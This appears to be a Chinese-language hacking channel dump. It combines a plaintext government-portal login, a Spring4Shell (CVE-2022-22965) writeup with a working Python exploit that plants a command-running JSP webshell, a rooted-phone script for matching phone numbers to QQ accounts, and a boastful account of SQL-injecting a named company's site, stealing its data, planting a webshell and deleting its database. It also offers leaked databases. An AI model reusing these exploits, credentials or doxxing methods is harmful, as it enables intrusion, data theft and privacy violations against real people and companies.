陕西全省不动产
陕西政务网-登录-跳到咸阳搜权利人-权利人查询-点击跳到咸阳不动产服务平台-选择区域-选择跳转区域-回到政务-回到市-切换市区-点击查询

账号：321322200409245414
密码：Xuhao0924.

漏洞名称：Spring Framework 远程代码执行漏洞（Spring4Shell）
漏洞编号：CVE-2022-22965
危害等级：高危（CVSS 9.8）blog.csdn
漏洞类型：远程代码执行（RCE）
核心原因：在 JDK 9+ 环境下，Spring MVC 的参数绑定机制允许通过 class.module.classLoader 绕过旧补丁（CVE-2010-1622），导致攻击者可修改 Tomcat 的 AccessLogValve 属性，写入恶意 JSP 文件（WebShell）
受影响版本：
组件 受影响版本范围 安全版本
Spring Framework 5.3.0–5.3.17, 5.2.0–5.2.19 ≥5.3.18, ≥5.2.20
Spring Boot 衍生框架（如 2.6.6 以下版本）≥2.6.6
利用条件（需同时满足）：
1.JDK 版本 ≥ 9（因 class.module 是 JDK 9+ 引入）juejin
2.使用 Apache Tomcat 作为 Servlet 容器
3.应用以 WAR 包方式部署（非 JAR）nics.nat.gov
4.依赖 spring-webmvc 或 spring-webflux

发送以下请求，若返回 HTTP 400 错误，可能存在漏洞：

curl -v "http://target:port/path?class.module.classLoader.URLs%5B0%5D=0"

原理：Spring 解析 classLoader.URLs[0]=0 时因类型不匹配（URL 数组无法赋值 0）抛出异常

以下代码来自开源项目

import requests

target_url = "http://target:port/helloworld/greeting"
payload_path = "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

# 发送payload
response = requests.get(target_url + payload_path)
if response.status_code == 200:
    print("[+] 漏洞可能存在！访问 WebShell：http://target:port/tomcatwar.jsp?pwd=j&cmd=whoami")
else:
    print("[-] 未检测到漏洞")

功能：自动发送 Payload 并写入 WebShell（路径：/tomcatwar.jsp），密码 pwd=j

访问 WebShell 执行命令：

curl "http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami"

成功则返回服务器用户信息（如 root）

概率Q反（需要root）——全自动手机号跑搜索框
烨筱and伤肝肾
（@love_so_yexiao）and（@KHCHADANG）

解压密码 https://t.me/yexiao_love_you

脚本原理：Tim（轻量版QQ），批量手机号反QQ账号头像URL进行对比，因为是屏幕脚本所以需要root用户使用该脚本。
请使用Termux 安装相关的库 和 tsu，不懂的可以去问群里大牛

测试效果↓

17324958813 - http://thirdqq.qlogo.cn/g?b=oidb&k=4H0jEFqX9hJrD1FxvxVXQA&kti=aQm0VQwB4hA&s=40
15322509015 - http://thirdqq.qlogo.cn/g?b=oidb&k=o11FCyCnLqOEd1IDygg2AQ&kti=aQm03wwB4hA&s=40
15090536410 - http://thirdqq.qlogo.cn/g?b=oidb&k=5dJzT4bhyqNIPBibZHJqJUA&kti=aQm06AwB4hI&s=40

注：里面的对比脚本要用电脑安装opencv，arm安卓不支持opencv
termux运行主程序
mt管理器root运行配套sh

使用tim的搜索框部分实现
如果用不了就去自己抓xy坐标自己填到脚本里面
开发者模式开触摸坐标显示，长按查看上面显示的xy
脚本里面第一个坐标是搜索框的最右侧（不是清除，一定要靠右），第二个坐标是手机输入法的回车键

运行主程序py之前一定要给tim打开，自己随便搜一个手机号之后再点击一遍那个输入框

唯一留言：叮当猫管理员是我的吹牛资本，诈骗和装逼也是我的最强手段，我的所有能力来源别人的想象力，我的人脉全来自我的吹牛逼技术，得到很多人的好感度，我的一句话就能让我的人脉害死你全家，我的一句话就能让别人给我全国头接口玩，我喜欢拿着别人的全国头泛滥，然后栽赃陷害给别人，说是别人想要泛滥自己才泛滥，我喜欢装大佬，跟别人说Q反的方向是我给的，我脑电波意淫出来的邮箱Q反就是我的压箱底接口，这辈子不会泛滥，你以为我是接口神？错了，我接口都是巴结别人的！你以为我是逆向解密大牛？错了，我是巴结别人给我解密的！我的组织连几个卖号的都能进去，这就是我组织的魅力，没有指名道姓说谁，不要在评论区破防对号入座，希望改正好自己虚伪的性格，并不是对某组织所有人存在恶意，大部分人存在一定的实力，只是对某人的人品做单方面评价

没有指名道姓说谁哦~ 急=输

请不要指点江山 虽然这个Q反含金量再怎么低 我们也承认只是个概率Q反 但请不要因此说垃圾或没用 经典之：拿破仑发现新大陆回来之后名声大噪，但是很多人都在偷偷议论说只要有人一直开船向那个方向开，谁都可以发现新大陆。有一次拿破仑知道他们议论的事之后，跟周围的人说：“你们谁能将一个鸡蛋立在桌子上面而不动？”周围的人都没有动，静静看着拿破仑表演。拿破仑拿起鸡蛋砸的凹进去了一点，鸡蛋果然立在桌子上不动了。众人嘲笑道：“这有什么好炫耀的，人人都知道的道理罢了。”拿破仑说：“本身就没什么好炫耀的，可是先生们，女士们，你们怎么没想过用到这个方法呢？难道真的是因为你们想到了只是懒得动吗？”

今日分享：森玛克精工科技（江苏）有限公司
链接： http://www.semirke.com/about.php?id=1
等级：SQL注入 -> Getshell
首先在对目标进行信息收集时，发现其官网一处 about.php 参数存在sql注入漏洞。通过sqlmap进行探测，确认了时间盲注和联合查询注入的存在，并成功获取数据库 adm82571079_db 的权限。
深入数据库后发现，其中存放着公司最核心的业务数据。这里共计拿到该公司的一些技术数据，包括各类减速机、电机的核心设计图纸、技术参数、物料清单（BOM表）。此外，还获取了国内客户的详细联系方式、历年销售合同及定价策略，以及国内供应商名单。

接着，为进一步窃取服务器上的文件资料，我们利用SQL注入的 INTO OUTFILE 功能，在读取网站配置文件获取到物理路径后，成功写入webshell，控制了服务器

这里成功进入内网了，后续在进行内部资料寻找，把中心放在研发和财务部门的文件服务器中，不过都是支出流水和一些工作报告，没什么用

目前把sql数据库的东西全删了，网站还能访问，欢迎各位大牛访问。😄

ps：图片默认保存的路径找不到了，只能纯文本了QAQ

@Yuhui_ddos thank you~

jhyjczx.com 此站脱库数据

一名Java 后端开发工程师，同时也是电信诈骗受害者，披露了一起涉及 “苹果 + 支付宝免密支付授权” 的严重安全问题。
受害者在完全不知情的情况下，仅一次 0.1 元操作，就被连续盗刷 999 元两笔。

@Yuhui_ddos 👏👏👏